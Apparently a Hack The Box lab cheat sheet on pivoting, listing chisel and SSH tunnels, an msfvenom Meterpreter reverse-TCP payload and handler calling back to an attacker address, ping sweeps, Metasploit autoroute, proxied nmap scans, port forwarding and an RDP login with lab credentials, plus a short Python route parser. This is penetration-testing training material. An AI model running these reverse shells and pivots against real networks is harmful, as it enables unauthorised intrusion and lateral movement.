Chisel Socks5
Victim
./chisel server -v -p 1234 --socks5
Attacker
./chisel client -v 10.129.202.64:1234 socks
proxychains.conf
MuhammadZubair@htb[/htb]$ tail -f /etc/proxychains.conf
#
# proxy types: http, socks4, socks5
# (auth types supported: "basic"-http "user/pass"-socks)
#
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
# socks4 127.0.0.1 9050
socks5 127.0.0.1 1080
Reverse
# Attacker
sudo ./chisel server --reverse -v -p 1234 --socks5
# Victim
./chisel client -v 10.10.14.17:1234 R:socks
proxychains
MuhammadZubair@htb[/htb]$ tail -f /etc/proxychains.conf
[ProxyList]
# add proxy here ...
# socks4 127.0.0.1 9050
socks5 127.0.0.1 1080
💡 Note: If you are getting an error message from chisel on the target, try a different chisel version.
Local Port Forward
ssh -L 1234:localhost:3306 ubuntu@10.129.202.64
Forwarding Multiple Ports
ssh -L 1234:localhost:3306 -L 8080:localhost:80 ubuntu@10.129.202.64
Dynamic Port Forwarding
ssh -D 9050 ubuntu@10.129.202.64
proxychains
MuhammadZubair@htb[/htb]$ tail -4 /etc/proxychains.conf
# meanwile
# defaults set to "tor"
socks4 127.0.0.1 9050
For more, please visit here.
Meterpreter Tunneling & Port Forwarding
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.14.18 -f elf -o backupjob LPORT=8080
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set lhost 0.0.0.0
lhost => 0.0.0.0
msf6 exploit(multi/handler) > set lport 8080
lport => 8080
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 0.0.0.0:8080
Ping Sweep
meterpreter > run post/multi/gather/ping_sweep RHOSTS=172.16.5.0/23
[*] Performing ping sweep for IP range 172.16.5.0/23
Ping Sweep For Loop on Linux Pivot Hosts
for i in {1..254}; do (ping -c 1 172.16.5.$i | grep "bytes from" &); done
Ping Sweep For Loop Using CMD
for /L %i in (1 1 254) do ping 172.16.5.%i -n 1 -w 100 | find "Reply"
Ping Sweep Using PowerShell
1..254 | % {"172.16.5.$($_): $(Test-Connection -count 1 -comp 172.16.5.$($_) -quiet)"}
Configuring MSF's SOCKS Proxy
msf6 > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set SRVPORT 9050
SRVPORT => 9050
msf6 auxiliary(server/socks_proxy) > set SRVHOST 0.0.0.0
SRVHOST => 0.0.0.0
msf6 auxiliary(server/socks_proxy) > set version 4a
version => 4a
msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 0.
[*] Starting the SOCKS proxy server
msf6 auxiliary(server/socks_proxy) > options

Module options (auxiliary/server/socks_proxy):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The address to listen on
   SRVPORT  9050             yes       The port to listen on
   VERSION  4a               yes       The SOCKS version to use (Accepted: 4a, 5)

Auxiliary action:

   Name   Description
   ----   -----------
   Proxy  Run a SOCKS proxy server
Confirming Proxy Server is Running
msf6 auxiliary(server/socks_proxy) > jobs

Jobs
====

  Id  Name                           Payload  Payload opts
  --  ----                           -------  ------------
  0   Auxiliary: server/socks_proxy
Adding a Line to proxychains.conf if Needed
socks4 127.0.0.1 9050
Creating Routes with AutoRoute
msf6 > use post/multi/manage/autoroute
msf6 post(multi/manage/autoroute) > set SESSION 1
SESSION => 1
msf6 post(multi/manage/autoroute) > set SUBNET 172.16.5.0
SUBNET => 172.16.5.0
msf6 post(multi/manage/autoroute) > run
[!] SESSION may not be compatible with this module:
[!]  * incompatible session platform: linux
[*] Running module against 10.129.202.64
[*] Searching for subnets to autoroute.
[+] Route added to subnet 10.129.0.0/255.255.0.0 from host's routing table.
[+] Route added to subnet 172.16.5.0/255.255.254.0 from host's routing table.
[*] Post module execution completed
It is also possible to add routes with autoroute by running autoroute from the Meterpreter session.
meterpreter > run autoroute -s 172.16.5.0/23
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 172.16.5.0/255.255.254.0...
[+] Added route to 172.16.5.0/255.255.254.0 via 10.129.202.64
[*] Use the -p option to list all active routes
Listing Active Routes with AutoRoute
meterpreter > run autoroute -p
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   10.129.0.0         255.255.0.0        Session 1
   172.16.4.0         255.255.254.0      Session 1
   172.16.5.0         255.255.254.0      Session 1
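The routing table above deserves a closer look: 172.16.5.0 is not on a /23 boundary, so 172.16.5.0/255.255.254.0 and 172.16.4.0/255.255.254.0 are the same network, and a session route covers 172.16.4.x hosts as well as 172.16.5.x. The added Python below (not from the original page or from Metasploit) parses `run autoroute -p` output, normalises each subnet/netmask pair, and picks the most specific route covering a given host, so the real scope of a route can be verified before traffic is sent through it. The sample table is copied from the output above.

```python
import ipaddress

# Constructed sample: the "Active Routing Table" block printed by
# `run autoroute -p` in the session above.
SAMPLE_TABLE = """\
Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   10.129.0.0         255.255.0.0        Session 1
   172.16.4.0         255.255.254.0      Session 1
   172.16.5.0         255.255.254.0      Session 1
"""


def parse_routes(text):
    """Return a list of (ip_network, gateway) from autoroute -p output.

    strict=False normalises the subnet to its true network address, so
    172.16.5.0/255.255.254.0 becomes 172.16.4.0/23 (172.16.4.0-172.16.5.255).
    """
    routes = []
    for line in text.splitlines():
        parts = line.split()
        # Data rows look like: <subnet> <netmask> Session <id>
        if len(parts) == 4 and parts[2] == "Session":
            net = ipaddress.ip_network(f"{parts[0]}/{parts[1]}", strict=False)
            routes.append((net, f"Session {parts[3]}"))
    return routes


def route_for(target, routes):
    """Longest-prefix match: the most specific route whose subnet holds target.

    Returns (network_str, gateway), or None when no route covers the host,
    in which case proxied traffic would not reach it through Meterpreter.
    """
    addr = ipaddress.ip_address(target)
    candidates = [(net, gw) for net, gw in routes if addr in net]
    if not candidates:
        return None
    net, gw = max(candidates, key=lambda r: r[0].prefixlen)
    return (str(net), gw)


if __name__ == "__main__":
    routes = parse_routes(SAMPLE_TABLE)
    for host in ("172.16.5.19", "172.16.4.40", "10.129.202.64", "192.168.1.1"):
        print(host, "->", route_for(host, routes))
```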
Testing Proxy & Routing Functionality
proxychains nmap 172.16.5.19 -p3389 -sT -v -Pn
ProxyChains-3.1 (http://proxychains.sf.net)
Initiating Connect Scan at 13:40
Scanning 172.16.5.19 [1 port]
|S-chain|-<>-127.0.0.1:9050-<><>-172.16.5.19:3389-<><>-OK
Completed Connect Scan at 13:40, 0.12s elapsed (1 total ports)
Nmap scan report for 172.16.5.19
Host is up (0.12s latency).

PORT     STATE SERVICE
3389/tcp open  ms-wbt-server

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.45 seconds
Port Forwarding
meterpreter > portfwd add -l 3300 -p 3389 -r 172.16.5.19
[*] Local TCP relay created: :3300 <-> 172.16.5.19:3389
Connecting to Windows Target through localhost
xfreerdp /v:localhost:3300 /u:victor /p:pass@123
$ netstat -antp
tcp        0      0 127.0.0.1:54652         127.0.0.1:3300          ESTABLISHED 4075/xfreerdp
Meterpreter Reverse Port Forwarding
Read more.
Sshuttle
sudo sshuttle -r ubuntu@10.129.202.64 172.16.5.0/23 -v